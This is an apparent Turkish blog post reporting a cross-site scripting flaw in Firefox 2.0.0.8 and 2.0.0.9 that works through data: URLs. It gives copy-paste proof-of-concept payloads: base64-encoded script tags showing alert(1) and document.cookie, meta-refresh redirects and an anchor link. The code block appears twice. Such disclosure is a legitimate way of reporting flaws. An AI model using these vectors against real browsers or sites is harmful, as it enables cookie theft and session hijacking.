Gün geçmiyorki yeni açıklar çıkmasın. Bu seferki açıkta Firefox'ta bulundu. 2.0.0.8 versiyonu geçtiğimiz haftalarda çıkmasına rağmen, kısa sürede yeni açıklar tespit edildi. Ayrıca 1 Kasım da çıkan 2.0.0.9 versiyonunda da bu açığın bulunduğu gözlendi. Firefox üzerinde XSS kodlarını rahatça çalıştırabilmek ve data url scheme açığını kullanabilmek mümkün. Bu açığı test edebilmeniz için altta bazı örnek kodlar paylaştım. XSS kodunuzu bu adresten base64 koduna çevirip alttaki gibi adres çubuğunda deneyebilirsiniz Firefox'un yeni sürümü yakın zamanda çıkabilir.
Alttaki kodları Firefox'un adres çubuğuna yapıştırıp deneyebilirsiniz.
CODE:
1. (**********alert(1);</script> base64'e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
2. data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=
3. (**********alert(document.cookie)</script> base64'e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
4. data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raW UpPC9zY3JpcHQ+
5. ****** http-********refresh" **********5;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
6. data:text/html,**********alert(1)</script>
7. data:text/cmd;,test
Veya alttaki kodları html olarak kaydedip te denemeniz mümkün.
CODE:
1. <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4="> XSS</a>
2. ****** http-********refresh" **********3;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
Alttaki kodları Firefox'un adres çubuğuna yapıştırıp deneyebilirsiniz.
CODE:
1. (**********alert(1);</script> base64'e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
2. data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=
3. (**********alert(document.cookie)</script> base64'e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
4. data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raW UpPC9zY3JpcHQ+
5. ****** http-********refresh" **********5;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
6. data:text/html,**********alert(1)</script>
7. data:text/cmd;,test
Veya alttaki kodları html olarak kaydedip te denemeniz mümkün.
CODE:
1. <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4="> XSS</a>
2. ****** http-********refresh" **********3;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">